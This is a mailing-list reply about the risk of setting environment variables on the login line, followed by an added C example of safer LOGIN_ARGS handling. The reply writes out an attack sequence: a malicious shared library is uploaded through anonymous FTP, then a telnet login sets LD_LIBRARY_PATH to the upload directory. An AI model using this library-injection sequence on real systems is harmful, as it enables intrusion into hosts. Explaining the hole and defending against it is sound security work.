> What is the concern about letting a user set some environment
> variables on the line with their login name? What does this
> mechanism allow that they couldn't have done anyway as soon as they
> get their shell prompt?

The "user" being logged in to may not _have_ a shell prompt.

Imagine you have a UUCP link to "host", login uume, and therefore know
the password - or perhaps you stole it from the real uume's owner. Or
perhaps "host" supports anonymous uucp.

    % ftp host
    Username: anonymous
    Password: dream@on
    ftp> cd pub/incoming
    ftp> bin
    ftp> put libc.so.12.5
    ftp> quit
    % telnet host
    login: uume LD_LIBRARY_PATH=/var/spool/ftp/pub/incoming

...and as soon as anything dynamically linked gets run, this little
daemon appears on port 32109, or something comparably evil.

No, I prefer just stuffing everything after the login name into a
LOGIN_ARGS variable and letting that be processed however software
wishes. A normal user may choose to "eval $LOGIN_ARGS"....

der Mouse
mouse@rodents.montreal.qc.ca
01 EE 31 F6 BB 0C 34 36 00 F3 7C 5A C1 A0 67 1D
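
Added example, not part of the original message and not taken from any login implementation: C code for the LOGIN_ARGS handling the reply prefers, where the text after the login name is kept as the value of one variable and never interpreted as NAME=VALUE. The function names are hypothetical, and the input line is assumed to have had its newline stripped already.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Split the text typed at "login:" into the name and everything after it.
 * Returns a pointer to the remainder ("" if none), or NULL on a bad name. */
const char *split_login_line(const char *line, char *user, size_t ulen)
{
    line += strspn(line, " \t");
    size_t n = strcspn(line, " \t\r\n");
    if (n == 0 || n >= ulen) return NULL;
    memcpy(user, line, n);
    user[n] = '\0';
    return line + n + strspn(line + n, " \t");
}

/* The remainder becomes the value of one variable and is never parsed as
 * NAME=VALUE, so it cannot create LD_LIBRARY_PATH. Caller frees. */
char *make_login_args_entry(const char *rest)
{
    size_t len = strlen("LOGIN_ARGS=") + strlen(rest) + 1;
    char *entry = malloc(len);
    if (entry) snprintf(entry, len, "LOGIN_ARGS=%s", rest);
    return entry;
}

/* Look up name in an envp-style array, as getenv() would. */
const char *env_lookup(char *const envp[], const char *name)
{
    size_t n = strlen(name);
    for (; *envp; envp++)
        if (strncmp(*envp, name, n) == 0 && (*envp)[n] == '=')
            return *envp + n + 1;
    return NULL;
}

int main(void)
{
    char user[32]; /* constructed input: the login line from the message */
    const char *rest = split_login_line(
        "uume LD_LIBRARY_PATH=/var/spool/ftp/pub/incoming", user, sizeof user);
    char *envp[] = { make_login_args_entry(rest), NULL };
    if (!envp[0]) return 1;
    printf("user=%s LOGIN_ARGS=%s loader path %s\n", user,
           env_lookup(envp, "LOGIN_ARGS"),
           env_lookup(envp, "LD_LIBRARY_PATH") ? "SET" : "unset");
    free(envp[0]);
    return 0;
}
```

An account with no shell, such as the uume login above, never evaluates LOGIN_ARGS, so the dynamic linker for its programs sees no caller-chosen search path.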